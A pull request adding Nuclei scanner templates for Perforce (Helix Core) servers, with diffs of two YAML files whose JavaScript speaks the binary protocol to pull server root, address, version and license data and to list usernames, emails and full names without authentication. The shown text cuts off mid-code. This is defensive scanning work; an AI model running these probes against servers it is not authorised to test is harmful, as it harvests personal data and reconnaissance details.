### PR TITLE
5x Perforce P4D (aka Helix Core) Templates - 1x Detection, 4x Misconfiguration

### DIFF
--- a/javascript/enumeration/perforce-info-disclosure.yaml
+++ b/javascript/enumeration/perforce-info-disclosure.yaml
@@ -1,72 +1,34 @@
 id: perforce-info-disclosure
 
 info:
-  name: Perforce Server Information Disclosure
+  name: Perforce Server - Information Disclosure
   author: Morgan Robertson
   severity: medium
   description: |
-    This template checks if a Perforce server discloses internal server information without authentication (dm.info.hide=0, which is the default). Extracted fields include the server version, server root path, internal server address, and license information. This template will not work on servers that enforce SSL. This template emulates the perforce binary protocol.
+    Detected Perforce server exposed internal server information without authentication due to dm.info.hide being set to 0 (the default). Disclosed fields included the server version, server root path, internal server address, and license information. SSL-enforcing servers are not affected.
   reference:
     - https://morganrobertson.net/p4wned/
     - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
     - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
-  remediation: |
-    Set dm.info.hide=1 to prevent unauthenticated access to server information.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-200
-    cpe: |
-         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
-         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+    cpe: cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*:*
   metadata:
-    max-requests: 2
+    verified: true
+    max-request: 2
     vendor: perforce
-    product: P4 (FKA "Helix Core", FKA "Perforce")
+    product: helix_core
+    shodan-query: port:1666 "P4D"
     fofa-query: port="1666" && protocol="unknown"
   tags: perforce,helixcore,scm,unauth,info-disclosure
 
 flow: tcp(1) && javascript(1)
 
-### Hex Bytes Decoded
-# Packet 1: Protocol Handshake
-# ----------------------------
-# cmpfile       : ""
-# altSync       : ""
-# client        : "97"
-# api           : "99999"
-# enableStreams : ""
-# enableGraph   : ""
-# expandAndmaps : ""
-# chunking      : ""
-# host          : "localhost"
-# port          : "192.168.0.101:1666" # Ignored by server
-# sndbuf        : "1969919"
-# rcvbuf        : "98304"
-# autoTune      : "1"
-# func          : "protocol"
-
-# Packet 2: Command (user-info)
-# -----------------------------
-# version       : "2024.2/LINUX26X86_64/2697822"
-# autoLogin     : ""
-# prog          : "p4"
-# client        : "localhost"
-# cwd           : "/tmp"
-# host          : "localhost"
-# os            : "UNIX"
-# locale        : "C"
-# user          : "user"
-# unicode       : ""
-# charset       : "1"
-# utf8bom       : "1"
-# clientCase    : "0"
-# func          : "user-info"
-
-
 tcp:
   - host:
-      - "{{Host}}:1666" # default port
+      - "{{Host}}:1666"
     inputs:
       - type: hex
         data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
@@ -85,7 +47,6 @@ javascript:
   - code: |
       var net = require("nuclei/net");
 
-      // --- HEX HELPERS ---
       function strToHex(str) {
           var hex = "";
           for (var i = 0; i < str.length; i++) {
@@ -123,7 +84,6 @@ javascript:
           return headerHex + payloadHex;
       }
 
-      // --- PARSER ---
       function parsePerforceResponse(dataStr) {
           var offset = 0;
           var results = [];
@@ -164,10 +124,8 @@ javascript:
           return results;
       }
 
-      // --- MAIN LOGIC ---
       var address = Host + ":" + Port;
 
-      // Packet 1: Protocol Handshake
       var p1 = [
           ["cmpfile", ""], ["altSync", ""], ["client", "76"], ["api", "99999"],
           ["enableStreams", ""], ["enableGraph", ""], ["expandAndmaps", ""], ["chunking", ""],
@@ -175,7 +133,6 @@ javascript:
           ["autoTune", "1"], ["func", "protocol"]
       ];
 
-      // Packet 2: user-info command (info is always ASCII-safe, no unicode needed)
       var p2 = [
           ["version", "2024.2/LINUX26X86_64/2697822"], ["autoLogin", ""], ["prog", "p4"],
           ["client", "localhost"], ["cwd", "/tmp"], ["host", "localhost"],
@@ -214,9 +171,6 @@ javascript:
           conn.Close();
       } catch (e) {}
 
-      // Parse & Extract
-      // Each info field arrives in a separate client-Message packet.
-      // Known field names: id (version), serverAddr, serverRoot, license
       var packets = parsePerforceResponse(rawBuffer);
       var info = {};
 
@@ -228,7 +182,6 @@ javascript:
           if (pkt['license'])    info['license']    = pkt['license'];
       }
 
-      // Only return if we got at least the server root (confirms dm.info.hide=0)
       if (info['serverRoot']) {
           JSON.stringify([info]);
       } else {

--- a/javascript/enumeration/perforce-info-disclosure.yaml
+++ b/javascript/enumeration/perforce-info-disclosure.yaml
@@ -1,0 +1,231 @@
+id: perforce-info-disclosure
+
+info:
+  name: Perforce Server Information Disclosure
+  author: Morgan Robertson
+  severity: medium
+  description: |
+    This template checks if a Perforce server discloses internal server information without authentication (dm.info.hide=0, which is the default). Extracted fields include the server version, server root path, internal server address, and license information. This template will not work on servers that enforce SSL. This template emulates the perforce binary protocol.
+  reference:
+    - https://morganrobertson.net/p4wned/
+    - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
+    - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
+  remediation: |
+    Set dm.info.hide=1 to prevent unauthenticated access to server information.
+    Full hardening: p4 configure set security=4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-200
+    cpe: |
+         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
+         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+  metadata:
+    max-requests: 2
+    vendor: perforce
+    product: P4 (FKA "Helix Core", FKA "Perforce")
+    fofa-query: port="1666" && protocol="unknown"
+  tags: perforce,helixcore,scm,unauth,info-disclosure
+
+flow: tcp(1) && javascript(1)
+
+tcp:
+  - host:
+      - "{{Host}}:1666" # default port
+    inputs:
+      - type: hex
+        data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
+    read-size: 4096
+    matchers:
+      - type: word
+        part: data
+        encoding: hex
+        words:
+          - "xfiles"
+          - "server"
+        condition: and
+        internal: true
+
+javascript:
+  - code: |
+      var net = require("nuclei/net");
+
+      // --- HEX HELPERS ---
+      function strToHex(str) {
+          var hex = "";
+          for (var i = 0; i < str.length; i++) {
+              var h = str.charCodeAt(i).toString(16);
+              if (h.length < 2) h = "0" + h;
+              hex += h;
+          }
+          return hex;
+      }
+
+      function numToHexLE(num) {
+          var b1 = (num & 0xFF), b2 = ((num >> 8) & 0xFF), b3 = ((num >> 16) & 0xFF), b4 = ((num >> 24) & 0xFF);
+          return [b1, b2, b3, b4].map(function(b) {
+              var s = b.toString(16);
+              return (s.length < 2 ? "0" + s : s);
+          }).join("");
+      }
+
+      function packParamHex(name, value) {
+          return strToHex(name) + "00" + numToHexLE(value.length) + strToHex(value) + "00";
+      }
+
+      function buildPacketHex(params) {
+          var payloadHex = "";
+          for (var i = 0; i < params.length; i++) {
+              payloadHex += packParamHex(params[i][0], params[i][1]);
+          }
+          var totalLen = payloadHex.length / 2;
+          var lenLow = totalLen & 0xFF;
+          var lenHigh = (totalLen >> 8) & 0xFF;
+          var xor = lenLow ^ lenHigh;
+          var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(b) {
+              var s = b.toString(16); return (s.length < 2 ? "0" + s : s);
+          }).join("");
+          return headerHex + payloadHex;
+      }
+
+      // --- PARSER ---
+      function parsePerforceResponse(dataStr) {
+          var offset = 0;
+          var results = [];
+          while (offset < dataStr.length) {
+              if (offset + 5 > dataStr.length) break;
+              var lenLow = dataStr.charCodeAt(offset + 1);
+              var lenHigh = dataStr.charCodeAt(offset + 2);
+              var bodyLen = lenLow | (lenHigh << 8);
+              var totalPacketSize = 5 + bodyLen;
+              if (offset + totalPacketSize > dataStr.length) break;
+
+              var body = dataStr.substring(offset + 5, offset + totalPacketSize);
+              var packetObj = {};
+              var bodyOffset = 0;
+
+              while (bodyOffset < body.length) {
+                  var nameEnd = body.indexOf('\u0000', bodyOffset);
+                  if (nameEnd === -1) break;
+                  var key = body.substring(bodyOffset, nameEnd);
+                  bodyOffset = nameEnd + 1;
+
+                  if (bodyOffset + 4 > body.length) break;
+                  var v0 = body.charCodeAt(bodyOffset);
+                  var v1 = body.charCodeAt(bodyOffset + 1);
+                  var v2 = body.charCodeAt(bodyOffset + 2);
+                  var v3 = body.charCodeAt(bodyOffset + 3);
+                  var valLen = (v0 | (v1 << 8) | (v2 << 16) | (v3 << 24)) >>> 0;
+                  bodyOffset += 4;
+
+                  if (bodyOffset + valLen > body.length) break;
+                  var value = body.substring(bodyOffset, bodyOffset + valLen);
+                  packetObj[key] = value;
+                  bodyOffset += valLen + 1;
+              }
+              results.push(packetObj);
+              offset += totalPacketSize;
+          }
+          return results;
+      }
+
+      // --- MAIN LOGIC ---
+      var address = Host + ":" + Port;
+
+      // Packet 1: Protocol Handshake
+      var p1 = [
+          ["cmpfile", ""], ["altSync", ""], ["client", "76"], ["api", "99999"],
+          ["enableStreams", ""], ["enableGraph", ""], ["expandAndmaps", ""], ["chunking", ""],
+          ["host", "localhost"], ["port", address], ["sndbuf", "1969919"], ["rcvbuf", "98304"],
+          ["autoTune", "1"], ["func", "protocol"]
+      ];
+
+      // Packet 2: user-info command (info is always ASCII-safe, no unicode needed)
+      var p2 = [
+          ["version", "2024.2/LINUX26X86_64/2697822"], ["autoLogin", ""], ["prog", "p4"],
+          ["client", "localhost"], ["cwd", "/tmp"], ["host", "localhost"],
+          ["os", "UNIX"], ["locale", "C"], ["user", "temp"],
+          ["charset", "1"], ["utf8bom", "1"], ["clientCase", "0"],
+          ["func", "user-info"]
+      ];
+
+      var p3 = [["func", "release"]];
+
+      var payloadHex = buildPacketHex(p1) + buildPacketHex(p2);
+      var releaseHex = buildPacketHex(p3);
+      var rawBuffer = "";
+
+      try {
+          var conn = net.Open("tcp", address);
+          conn.SendHex(payloadHex);
+          conn.SetTimeout(5);
+
+          for (var loop = 0; loop < 10; loop++) {
+              try {
+                  var bytes = conn.Recv(4096);
+                  if (bytes && bytes.length > 0) {
+                      for (var i = 0; i < bytes.length; i++) {
+                          rawBuffer += String.fromCharCode(bytes[i]);
+                      }
+                      if (rawBuffer.indexOf('func\u0000\u0007\u0000\u0000\u0000release\u0000') !== -1) {
+                          break;
+                      }
+                  } else {
+                      break;
+                  }
+              } catch (e) { break; }
+          }
+          try { conn.SendHex(releaseHex); } catch(e) {}
+          conn.Close();
+      } catch (e) {}
+
+      // Parse & Extract
+      // Each info field arrives in a separate client-Message packet.
+      // Known field names: id (version), serverAddr, serverRoot, license
+      var packets = parsePerforceResponse(rawBuffer);
+      var info = {};
+
+      for (var i = 0; i < packets.length; i++) {
+          var pkt = packets[i];
+          if (pkt['serverRoot']) info['serverRoot'] = pkt['serverRoot'];
+          if (pkt['serverAddr']) info['serverAddr'] = pkt['serverAddr'];
+          if (pkt['id'])         info['version']    = pkt['id'];
+          if (pkt['license'])    info['license']    = pkt['license'];
+      }
+
+      // Only return if we got at least the server root (confirms dm.info.hide=0)
+      if (info['serverRoot']) {
+          JSON.stringify([info]);
+      } else {
+          JSON.stringify([]);
+      }
+
+    args:
+      Host: "{{Host}}"
+      Port: "1666"
+
+    matchers:
+      - type: word
+        words:
+          - '"serverRoot":'
+
+    extractors:
+      - type: json
+        name: version
+        json:
+          - '.[].version'
+
+      - type: json
+        name: server_root
+        json:
+          - '.[].serverRoot'
+
+      - type: json
+        name: server_addr
+        json:
+          - '.[].serverAddr'
+
+      - type: json
+        name: license
+        json:
+          - '.[].license'

--- a/javascript/enumeration/perforce-info-disclosure.yaml
+++ b/javascript/enumeration/perforce-info-disclosure.yaml
@@ -29,6 +29,42 @@ info:
 
 flow: tcp(1) && javascript(1)
 
+### Hex Bytes Decoded
+# Packet 1: Protocol Handshake
+# ----------------------------
+# cmpfile       : ""
+# altSync       : ""
+# client        : "97"
+# api           : "99999"
+# enableStreams : ""
+# enableGraph   : ""
+# expandAndmaps : ""
+# chunking      : ""
+# host          : "localhost"
+# port          : "192.168.0.101:1666" # Ignored by server
+# sndbuf        : "1969919"
+# rcvbuf        : "98304"
+# autoTune      : "1"
+# func          : "protocol"
+
+# Packet 2: Command (user-info)
+# -----------------------------
+# version       : "2024.2/LINUX26X86_64/2697822"
+# autoLogin     : ""
+# prog          : "p4"
+# client        : "localhost"
+# cwd           : "/tmp"
+# host          : "localhost"
+# os            : "UNIX"
+# locale        : "C"
+# user          : "user"
+# unicode       : ""
+# charset       : "1"
+# utf8bom       : "1"
+# clientCase    : "0"
+# func          : "user-info"
+
+
 tcp:
   - host:
       - "{{Host}}:1666" # default port

--- a/javascript/enumeration/perforce-info-disclosure.yaml
+++ b/javascript/enumeration/perforce-info-disclosure.yaml
@@ -12,7 +12,6 @@ info:
     - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
   remediation: |
     Set dm.info.hide=1 to prevent unauthenticated access to server information.
-    Full hardening: p4 configure set security=4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3

--- a/javascript/enumeration/perforce-user-enum.yaml
+++ b/javascript/enumeration/perforce-user-enum.yaml
@@ -13,7 +13,6 @@ info:
   remediation: |
     Set run.users.authorize=1 to require authentication for user listing.
     Set dm.user.noautocreate=2 to prevent unauthenticated account creation.
-    Full hardening: p4 configure set security=4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3

--- a/javascript/enumeration/perforce-user-enum.yaml
+++ b/javascript/enumeration/perforce-user-enum.yaml
@@ -45,8 +45,8 @@ tcp:
         part: data
         encoding: hex
         words:
-          - "xfiles" 
-          - "server" 
+          - "xfiles"
+          - "server"
         condition: and
         internal: true
 
@@ -105,9 +105,9 @@ javascript:
 
       function numToHexLE(num) {
           var b1 = (num & 0xFF), b2 = ((num >> 8) & 0xFF), b3 = ((num >> 16) & 0xFF), b4 = ((num >> 24) & 0xFF);
-          return [b1, b2, b3, b4].map(function(s){ 
-             var x = s.toString(16); 
-             return (x.length<2 ? "0"+x : x); 
+          return [b1, b2, b3, b4].map(function(s){
+             var x = s.toString(16);
+             return (x.length<2 ? "0"+x : x);
           }).join("");
       }
 
@@ -124,9 +124,9 @@ javascript:
           var lenLow = totalLen & 0xFF;
           var lenHigh = (totalLen >> 8) & 0xFF;
           var xor = lenLow ^ lenHigh;
-          var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(s){ 
-             var x = s.toString(16); 
-             return (x.length<2 ? "0"+x : x); 
+          var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(s){
+             var x = s.toString(16);
+             return (x.length<2 ? "0"+x : x);
           }).join("");
           return headerHex + payloadHex;
       }
@@ -150,7 +150,7 @@ javascript:
                   var nameEnd = body.indexOf('\u0000', bodyOffset);
                   if (nameEnd === -1) break;
                   var key = body.substring(bodyOffset, nameEnd);
-                  bodyOffset = nameEnd + 1; 
+                  bodyOffset = nameEnd + 1;
 
                   if (bodyOffset + 4 > body.length) break;
                   var v0 = body.charCodeAt(bodyOffset);
@@ -174,7 +174,7 @@ javascript:
       // --- LOGIC: Try Enum ---
       function enumUsers(host, port, useUnicode) {
           var address = host + ":" + port;
-          
+
           var p1 = [
               ["cmpfile", ""], ["altSync", ""], ["client", "76"], ["api", "99999"],
               ["enableStreams", ""], ["enableGraph", ""], ["expandAndmaps", ""], ["chunking", ""],
@@ -201,13 +201,13 @@ javascript:
 
           var payloadHex = buildPacketHex(p1) + buildPacketHex(p2);
           var releaseHex = buildPacketHex(p3);
-          var rawBuffer = ""; 
+          var rawBuffer = "";
 
           try {
               var conn = net.Open("tcp", address);
               conn.SendHex(payloadHex);
               conn.SetTimeout(3);
-              
+
               for(var loop=0; loop<10; loop++) {
                   try {
                       var bytes = conn.Recv(4096);
@@ -265,7 +265,7 @@ javascript:
         name: users
         json:
           - '.[].user'
-          
+
       - type: json
         name: emails
         json:

--- a/javascript/enumeration/perforce-user-enum.yaml
+++ b/javascript/enumeration/perforce-user-enum.yaml
@@ -1,40 +1,34 @@
 id: perforce-user-enumeration
 
 info:
-  name: Perforce User Enumeration
+  name: Perforce Server - User Enumeration
   author: Morgan Robertson
   severity: medium
   description: |
-    This template checks if a perforce server is configured such that it allows an anonymous user listing, which is the default setting (run.users.authorize=0). This template works on both ASCII and unicode servers by sending an ASCII compatible request and if that fails, a unicode compatible request. This template will not work on servers that enforce SSL. This template emulates the perforce binary protocol and extracts usernames, emails and full names.
+    Detected Perforce server allowed anonymous user listing due to run.users.authorize being set to 0 (the default). The server returned a full list of users including usernames, email addresses, and full names without authentication. Both ASCII and Unicode server modes were affected. SSL-enforcing servers are not affected.
   reference:
     - https://morganrobertson.net/p4wned/
     - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
     - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
-  remediation: |
-    Set run.users.authorize=1 to require authentication for user listing.
-    Set dm.user.noautocreate=2 to prevent unauthenticated account creation.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-200
-    cpe: |
-         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
-         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+    cpe: cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*:*
   metadata:
-    max-requests: 3
+    verified: true
+    max-request: 3
     vendor: perforce
-    product: P4 (FKA "Helix Core", FKA "Perforce")
-    fofa-query: \"add SSL protocol prefix to P4PORT" && protocol="unknown"
-  tags: perforce,helixcore,scm,unauth,user-listing
-
+    product: helix_core
+    shodan-query: port:1666 "P4D"
+    fofa-query: port="1666" && protocol="unknown"
+  tags: perforce,helixcore,scm,unauth,user-listing,enum
 
 flow: tcp(1) && javascript(1)
 
-### Detect Perforce Server so user extraction javascript code only runs against appropriate servers.
-
 tcp:
   - host:
-      - "{{Host}}:1666" # default port
+      - "{{Host}}:1666"
     inputs:
       - type: hex
         data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
@@ -49,49 +43,10 @@ tcp:
         condition: and
         internal: true
 
-### Hex Bytes Decoded
-# Packet 1: Protocol Handshake
-# ----------------------------
-# cmpfile       : ""
-# altSync       : ""
-# client        : "97"
-# api           : "99999"
-# enableStreams : ""
-# enableGraph   : ""
-# expandAndmaps : ""
-# chunking      : ""
-# host          : "localhost"
-# port          : "192.168.0.101:1666" # Ignored by server
-# sndbuf        : "1969919"
-# rcvbuf        : "98304"
-# autoTune      : "1"
-# func          : "protocol"
-
-# Packet 2: Command (user-info)
-# -----------------------------
-# version       : "2024.2/LINUX26X86_64/2697822"
-# autoLogin     : ""
-# prog          : "p4"
-# client        : "localhost"
-# cwd           : "/tmp"
-# host          : "localhost"
-# os            : "UNIX"
-# locale        : "C"
-# user          : "user"
-# unicode       : ""
-# charset       : "1"
-# utf8bom       : "1"
-# clientCase    : "0"
-# func          : "user-info"
-
-
-## Extract users by sending a user-users RPC call to the perforce server in ASCII mode, and if that doesn't work, then try the unicode mode.
-
 javascript:
   - code: |
       var net = require("nuclei/net");
 
-      // --- HELPERS ---
       function strToHex(str) {
           var hex = "";
           for (var i = 0; i < str.length; i++) {
@@ -170,7 +125,6 @@ javascript:
           return results;
       }
 
-      // --- LOGIC: Try Enum ---
       function enumUsers(host, port, useUnicode) {
           var address = host + ":" + port;
 
@@ -243,11 +197,8 @@ javascript:
           return extractedUsers;
       }
 
-      // --- EXECUTION ---
-      // 1. Try ASCII
       var users = enumUsers(Host, Port, false);
 
-      // 2. If empty, try Unicode
       if (users.length === 0) {
           users = enumUsers(Host, Port, true);
       }
@@ -258,7 +209,13 @@ javascript:
       Host: "{{Host}}"
       Port: "1666"
 
-    # We use extractors to parse the JSON returned by the script
+    matchers:
+      - type: word
+        words:
+          - '"user":'
+          - '"email":'
+        condition: and
+
     extractors:
       - type: json
         name: users

--- a/javascript/enumeration/perforce-user-enum.yaml
+++ b/javascript/enumeration/perforce-user-enum.yaml
@@ -1,0 +1,277 @@
+id: perforce-user-enumeration
+
+info:
+  name: Perforce User Enumeration
+  author: Morgan Robertson
+  severity: medium
+  description: |
+    This template checks if a perforce server is configured such that it allows an anonymous user listing, which is the default setting (run.users.authorize=0). This template works on both ASCII and unicode servers by sending an ASCII compatible request and if that fails, a unicode compatible request. This template will not work on servers that enforce SSL. This template emulates the perforce binary protocol and extracts usernames, emails and full names.
+  reference:
+    - https://morganrobertson.net/p4wned/
+    - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
+    - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
+  remediation: |
+    Set run.users.authorize=1 to require authentication for user listing.
+    Set dm.user.noautocreate=2 to prevent unauthenticated account creation.
+    Full hardening: p4 configure set security=4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-200
+    cpe: |
+         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
+         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+  metadata:
+    max-requests: 3
+    vendor: perforce
+    product: P4 (FKA "Helix Core", FKA "Perforce")
+    fofa-query: \"add SSL protocol prefix to P4PORT" && protocol="unknown"
+  tags: perforce,helixcore,scm,unauth,user-listing
+
+
+flow: tcp(1) && javascript(1)
+
+### Detect Perforce Server so user extraction javascript code only runs against appropriate servers.
+
+tcp:
+  - host:
+      - "{{Host}}:1666" # default port
+    inputs:
+      - type: hex
+        data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
+    read-size: 4096
+    matchers:
+      - type: word
+        part: data
+        encoding: hex
+        words:
+          - "xfiles" 
+          - "server" 
+        condition: and
+        internal: true
+
+### Hex Bytes Decoded
+# Packet 1: Protocol Handshake
+# ----------------------------
+# cmpfile       : ""
+# altSync       : ""
+# client        : "97"
+# api           : "99999"
+# enableStreams : ""
+# enableGraph   : ""
+# expandAndmaps : ""
+# chunking      : ""
+# host          : "localhost"
+# port          : "192.168.0.101:1666" # Ignored by server
+# sndbuf        : "1969919"
+# rcvbuf        : "98304"
+# autoTune      : "1"
+# func          : "protocol"
+
+# Packet 2: Command (user-info)
+# -----------------------------
+# version       : "2024.2/LINUX26X86_64/2697822"
+# autoLogin     : ""
+# prog          : "p4"
+# client        : "localhost"
+# cwd           : "/tmp"
+# host          : "localhost"
+# os            : "UNIX"
+# locale        : "C"
+# user          : "user"
+# unicode       : ""
+# charset       : "1"
+# utf8bom       : "1"
+# clientCase    : "0"
+# func          : "user-info"
+
+
+## Extract users by sending a user-users RPC call to the perforce server in ASCII mode, and if that doesn't work, then try the unicode mode.
+
+javascript:
+  - code: |
+      var net = require("nuclei/net");
+
+      // --- HELPERS ---
+      function strToHex(str) {
+          var hex = "";
+          for (var i = 0; i < str.length; i++) {
+              var h = str.charCodeAt(i).toString(16);
+              if (h.length < 2) h = "0" + h;
+              hex += h;
+          }
+          return hex;
+      }
+
+      function numToHexLE(num) {
+          var b1 = (num & 0xFF), b2 = ((num >> 8) & 0xFF), b3 = ((num >> 16) & 0xFF), b4 = ((num >> 24) & 0xFF);
+          return [b1, b2, b3, b4].map(function(s){ 
+             var x = s.toString(16); 
+             return (x.length<2 ? "0"+x : x); 
+          }).join("");
+      }
+
+      function packParamHex(name, value) {
+          return strToHex(name) + "00" + numToHexLE(value.length) + strToHex(value) + "00";
+      }
+
+      function buildPacketHex(params) {
+          var payloadHex = "";
+          for (var i = 0; i < params.length; i++) {
+              payloadHex += packParamHex(params[i][0], params[i][1]);
+          }
+          var totalLen = payloadHex.length / 2;
+          var lenLow = totalLen & 0xFF;
+          var lenHigh = (totalLen >> 8) & 0xFF;
+          var xor = lenLow ^ lenHigh;
+          var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(s){ 
+             var x = s.toString(16); 
+             return (x.length<2 ? "0"+x : x); 
+          }).join("");
+          return headerHex + payloadHex;
+      }
+
+      function parsePerforceResponse(dataStr) {
+          var offset = 0;
+          var results = [];
+          while (offset < dataStr.length) {
+              if (offset + 5 > dataStr.length) break;
+              var lenLow = dataStr.charCodeAt(offset + 1);
+              var lenHigh = dataStr.charCodeAt(offset + 2);
+              var bodyLen = lenLow | (lenHigh << 8);
+              var totalPacketSize = 5 + bodyLen;
+              if (offset + totalPacketSize > dataStr.length) break;
+
+              var body = dataStr.substring(offset + 5, offset + totalPacketSize);
+              var packetObj = {};
+              var bodyOffset = 0;
+
+              while (bodyOffset < body.length) {
+                  var nameEnd = body.indexOf('\u0000', bodyOffset);
+                  if (nameEnd === -1) break;
+                  var key = body.substring(bodyOffset, nameEnd);
+                  bodyOffset = nameEnd + 1; 
+
+                  if (bodyOffset + 4 > body.length) break;
+                  var v0 = body.charCodeAt(bodyOffset);
+                  var v1 = body.charCodeAt(bodyOffset+1);
+                  var v2 = body.charCodeAt(bodyOffset+2);
+                  var v3 = body.charCodeAt(bodyOffset+3);
+                  var valLen = (v0 | (v1 << 8) | (v2 << 16) | (v3 << 24)) >>> 0;
+                  bodyOffset += 4;
+
+                  if (bodyOffset + valLen > body.length) break;
+                  var value = body.substring(bodyOffset, bodyOffset + valLen);
+                  packetObj[key] = value;
+                  bodyOffset += valLen + 1;
+              }
+              results.push(packetObj);
+              offset += totalPacketSize;
+          }
+          return results;
+      }
+
+      // --- LOGIC: Try Enum ---
+      function enumUsers(host, port, useUnicode) {
+          var address = host + ":" + port;
+          
+          var p1 = [
+              ["cmpfile", ""], ["altSync", ""], ["client", "76"], ["api", "99999"],
+              ["enableStreams", ""], ["enableGraph", ""], ["expandAndmaps", ""], ["chunking", ""],
+              ["host", "localhost"], ["port", address], ["sndbuf", "1969919"], ["rcvbuf", "98304"],
+              ["autoTune", "1"], ["func", "protocol"]
+          ];
+
+          var p2 = [
+              ["version", "2024.2/LINUX26X86_64/2697822"], ["autoLogin", ""], ["prog", "p4"],
+              ["client", "localhost"], ["cwd", "/tmp"], ["host", "localhost"],
+              ["os", "UNIX"], ["locale", "C"], ["user", "temp"]
+          ];
+
+          if (useUnicode) {
+              p2.push(["unicode", ""]);
+          }
+
+          p2.push(["charset", "1"]);
+          p2.push(["utf8bom", "1"]);
+          p2.push(["clientCase", "0"]);
+          p2.push(["func", "user-users"]);
+
+          var p3 = [ ["func", "release"] ];
+
+          var payloadHex = buildPacketHex(p1) + buildPacketHex(p2);
+          var releaseHex = buildPacketHex(p3);
+          var rawBuffer = ""; 
+
+          try {
+              var conn = net.Open("tcp", address);
